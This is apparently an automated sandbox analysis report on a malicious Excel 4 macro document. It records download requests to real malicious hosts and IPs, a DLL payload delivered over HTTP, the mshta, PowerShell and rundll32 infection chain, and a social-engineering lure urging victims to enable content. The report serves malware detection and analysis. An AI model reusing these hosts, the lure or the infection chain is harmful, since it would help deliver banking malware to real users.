                            Source: global traffic | HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1 Host: kuyporn.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1 Host: jeffreylubin.igclout.com Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 557056 Connection: keep-alive Keep-Alive: timeout=15 Date: Fri, 28 Jan 2022 20:08:01 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 28 Jan 2022 20:08:01 GMT Content-Disposition: attachment; filename="v3Q.dll" Content-Transfer-Encoding: binary Set-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/ Last-Modified: Fri, 28 Jan 2022 20:08:01 GMT X-Frame-Options: SAMEORIGIN
                            Source: global traffic | HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
                            Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
                            Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox View | IP Address: 207.148.81.119
                            Source: Joe Sandbox View | IP Address: 104.131.62.48
                            Source: unknown | Network traffic detected: IP country count 15
                            Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
                            Source: unknown | DNS traffic detected: queries for: kuyporn.com
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown | TCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            Source: DETAILS-145.xls, Macro extractor: Sheet: Macro1 contains: mshta
                            Source: DETAILS-145.xls, type: SAMPLE, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\QWER.dll
                            Source: DETAILS-145.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001804B89_2_001804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001874DD9_2_001874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001904DE9_2_001904DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001864F19_2_001864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001744FA9_2_001744FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001835129_2_00183512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017F58F9_2_0017F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001845CD9_2_001845CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018561F9_2_0018561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018363D9_2_0018363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001786509_2_00178650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001936729_2_00193672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017472E9_2_0017472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001827539_2_00182753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017777B9_2_0017777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001728309_2_00172830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001818319_2_00181831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017B8219_2_0017B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017C8509_2_0017C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001868649_2_00186864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017E86A9_2_0017E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001908679_2_00190867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001768DE9_2_001768DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D8D79_2_0018D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001788F49_2_001788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017F93D9_2_0017F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001719509_2_00171950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017194C9_2_0017194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001809469_2_00180946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001919939_2_00191993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C9A99_2_0018C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001899AA9_2_001899AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176A1F9_2_00176A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017CA439_2_0017CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00179A7D9_2_00179A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191B549_2_00191B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184B569_2_00184B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017BB4B9_2_0017BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017AB669_2_0017AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00177B829_2_00177B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00187BCA9_2_00187BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018EBFF9_2_0018EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00182BF69_2_00182BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176C299_2_00176C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017EC9B9_2_0017EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018CC899_2_0018CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018ACD39_2_0018ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017BD0F9_2_0017BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00180D339_2_00180D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00190D5B9_2_00190D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183D419_2_00183D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188D719_2_00188D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00178D959_2_00178D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017FD8C9_2_0017FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018EE949_2_0018EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017AE9A9_2_0017AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018BE8C9_2_0018BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176ED69_2_00176ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018FF319_2_0018FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00171F9B9_2_00171F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00173FB89_2_00173FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00172FA19_2_00172FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017CFCE9_2_0017CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BE8C10_2_0023BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EE9410_2_0023EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022EC9B10_2_0022EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E49810_2_0023E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002270ED10_2_002270ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00235CF910_2_00235CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002374DD10_2_002374DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F93D10_2_0022F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022970010_2_00229700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023351210_2_00233512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241B5410_2_00241B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B39110_2_0023B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228D9510_2_00228D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B82110_2_0022B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A42910_2_0023A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226C2910_2_00226C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023542E10_2_0023542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023183110_2_00231831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022283010_2_00222830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023363D10_2_0023363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B41A10_2_0022B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023561F10_2_0023561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226A1F10_2_00226A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024086710_2_00240867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023686410_2_00236864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E86A10_2_0022E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023026B10_2_0023026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024146E10_2_0024146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024367210_2_00243672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229A7D10_2_00229A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CA4310_2_0022CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E24310_2_0022E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023504010_2_00235040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C85010_2_0022C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022865010_2_00228650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002304B810_2_002304B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022608310_2_00226083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023CC8910_2_0023CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AE9A10_2_0022AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023109E10_2_0023109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023129C10_2_0023129C
